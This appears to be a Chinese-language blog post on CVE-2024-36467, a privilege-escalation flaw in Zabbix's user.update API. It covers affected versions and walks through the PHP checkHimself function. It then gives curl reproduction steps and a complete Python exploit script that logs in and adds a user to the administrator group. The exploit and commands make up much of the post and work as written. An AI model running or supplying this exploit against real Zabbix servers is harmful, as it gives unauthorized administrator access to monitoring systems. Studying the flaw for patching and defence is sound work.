当前位置: 首页 > news >正文

CVE-2024-36467 Zabbix权限提升

news 2025/6/8 7:13:35

漏洞描述

  • 在Zabbix中,具有API访问权限的已认证用户(例如具有默认用户角色的用户)可以通过调用user.update API接口,将自己添加到任何用户组(如Zabbix管理员组)。
  • 然而,用户无法添加到已被禁用或具有受限GUI访问权限的用户组。
  • 该漏洞源于缺乏对用户组添加操作的授权检查。

影响版本

  • Zabbix 5.0.42
  • Zabbix 6.0.32
  • Zabbix 6.4.17
  • Zabbix 7.0.1rc1

源码分析

在validateUpdate 函数中,调用了第 542 行第 1109 行的 checkHimself 函数。checkYourself 函数包含以下代码:

private function checkHimself(array $users) {
foreach ($users as $user) {
if (bccomp($user['userid'], self::$userData['userid']) == 0) {
if (array_key_exists('roleid', $user) && $user['roleid'] !=
self::$userData['roleid']) {
self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change
own role.'));
}
if (array_key_exists('usrgrps', $user)) {
$db_usrgrps = DB::select('usrgrp', [
'output' => ['gui_access', 'users_status'],
'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')
]);
foreach ($db_usrgrps as $db_usrgrp) {
if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED
|| $db_usrgrp['users_status'] ==
GROUP_STATUS_DISABLED) {
self::exception(ZBX_API_ERROR_PARAMETERS,
_('User cannot add himself to a disabled group or a
group with disabled GUI access.')
);
}
}
}
break;
}
}
}
  • if (bccomp($user['userid'], self::$userData['userid']) == 0) :bccomp 比较当前遍历的用户 ID 和当前登录用户 ID(self::$userData['userid']),如果匹配(返回 0),说明用户在尝试修改自己的数据。
  • if (array_key_exists('roleid', $user) && $user['roleid'] != self::$userData['roleid']) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot change own role.'));}:当要修改的用户id与当前用户的id不一致时将会报错。即只能修改自己的数据。
if (array_key_exists('usrgrps', $user)) {$db_usrgrps = DB::select('usrgrp', ['output' => ['gui_access', 'users_status'],'usrgrpids' => zbx_objectValues($user['usrgrps'], 'usrgrpid')]);

这段代码用于检查用户组权限,如果请求中包含 usrgrps(用户组变更),就从数据库查询这些组的 gui_access 和 users_status 字段。

foreach ($db_usrgrps as $db_usrgrp) {if ($db_usrgrp['gui_access'] == GROUP_GUI_ACCESS_DISABLED|| $db_usrgrp['users_status'] == GROUP_STATUS_DISABLED) {self::exception(ZBX_API_ERROR_PARAMETERS, _('User cannot add himself to a disabled group or a group with disabled GUI access.'));}
}

这段代码用于验证组的状态,如果处于禁用或禁止GUI访问状态,就会报错。

从以上代码可以看出用户只能修改自己的数据,在用户组变更时没有对用户的权限进行校验,只检查用户组的状态,因此用户可以将自己添加进任意组中。

复现步骤

(1)尝试登陆,如果登陆成功会返回登陆凭证

curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.login","params":
{"username":"user","password":"yong1234"},"id":1}'

(2)修改当前用户的用户组

原本user属于Guests群组

输入命令

curl --request POST \
--url 'http://192.168.116.134/api_jsonrpc.php' \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.update","params":
{"userid":"3","usrgrps":[{"usrgrpid":"7"}]},"auth":"7f33020f67fc24a13bf37b72e974d73a","id":1}'

发现user的群组已经更改为管理员群组了

EXP

import requests
import jsondef get_auth(target, username, password):login_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}login_data = {"jsonrpc": "2.0","method": "user.login","params": {"username": username,"password": password},"id": 1}try:login_response = requests.post(login_url,headers=headers,data=json.dumps(login_data),timeout=10,verify=False)if login_response.status_code != 200:print(f"[-] 登录失败,HTTP状态码: {login_response.status_code}")return Falselogin_result = login_response.json()auth_token = login_result['result']print(f"[+] 成功获取认证令牌: {auth_token}")return auth_tokenexcept requests.exceptions.RequestException as e:print(f"[-] 请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falsedef update_user_group(target, auth_token):update_url = f"http://{target}/api_jsonrpc.php"headers = {'Content-Type': 'application/json-rpc','User-Agent': 'Zabbix-Privilege Escalation-Scanner'}update_data = {"jsonrpc": "2.0","method": "user.update","params": {"userid": "3","usrgrps": [{"usrgrpid": "7"}]},"auth": auth_token,"id": 1}try:response = requests.post(update_url,headers=headers,data=json.dumps(update_data),timeout=10,verify=False)update_result = response.json()if response.status_code != 200:print(f"[-] 更改失败,HTTP状态码: {response.status_code}")return Falseelse:print(update_result)except requests.exceptions.RequestException as e:print(f"[-] 更改请求失败: {str(e)}")return Falseexcept json.JSONDecodeError as e:print(f"[-] JSON解析失败: {str(e)}")return Falseif __name__ == '__main__':target = input("请输入目标IP:")username = input("请输入用户名:")password = input("请输入密码:")auth_token = get_auth(target, username, password)update_user_group(target, auth_token)

http://www.xdnf.cn/news/658261.html

相关文章:

  • java枚举和mybaits-plus结合实现映射输出和存储
  • VScode怎么运行一个c语言程序
  • ChatGPT与认知科学:人机协同的未来图景
  • STM32 IIC总线死锁问题总结
  • 洛谷——P3372 【模板】线段树 1
  • webpack吐环境分析
  • 为什么使用ollama运行的模型不用gpu也可以使用
  • [攻防世界] easyphp writeup
  • Graph Neural Network(GNN)
  • 如何通过全流量溯源分析系统实现高效的网络质量监控
  • JavaSE核心知识点04工具04-02(IDEA)
  • 关于(stream)流
  • MySQL的基础操作
  • 内网搭建NTS服务器
  • 网络安全之Web渗透加解密
  • 原子操作(Atomic Operations)在SOC中的应用场景
  • 【R语言编程绘图-函数篇】
  • Sparse VideoGen开源:完全无损,视频生成速度加速两倍,支持Wan 2.1、HunyuanVideo等
  • DAY12打卡 启发式算法
  • 基于yjs实现协同编辑页面
  • 学习黑客Metasploit 框架的原理
  • 端午假期 · 粽享欢乐
  • 开源Vue表单设计器 FcDesigner 组件提供的方法详解
  • 《1.1_4计算机网络的分类|精讲篇|附X-mind思维导图》
  • deepseek告诉您http与https有何区别?
  • CQF预备知识:一、微积分 -- 1.4.6 莱布尼茨法则详解
  • Mysql在SQL层面的优化
  • [Java实战]SpringBoot集成SNMP实现OID数据获取:原理、实践与测试(三十三)
  • GitLab 从 17.10 到 18.0.1 的升级指南
  • 动态规划-918.环形子数组的最大和-力扣(LeetCode)